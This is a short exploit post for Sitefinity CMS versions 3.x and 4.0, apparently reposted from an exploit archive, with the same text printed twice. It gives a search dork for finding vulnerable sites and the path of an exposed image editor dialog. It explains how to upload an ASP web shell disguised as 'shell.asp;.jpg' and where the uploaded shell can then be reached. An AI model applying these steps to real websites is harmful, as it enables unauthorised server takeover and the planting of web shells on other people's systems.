========================================================================
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
========================================================================
#################################################################################
#
# Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 16/11/2010
# Author: Banj4rnymouz
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : "Sitefinity: Login"
# Contact: twitter.com/banj4rnymouz ~ banj4rnymouz@gmail.com
#
#################################################################################
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://site.com/sitefinity/
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar
#Regard's "Banj4rnymouz"
#################################################################################
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
========================================================================
#################################################################################
#
# Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 16/11/2010
# Author: Banj4rnymouz
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : "Sitefinity: Login"
# Contact: twitter.com/banj4rnymouz ~ banj4rnymouz@gmail.com
#
#################################################################################
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://site.com/sitefinity/
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar
#Regard's "Banj4rnymouz"
#################################################################################
Posting Komentar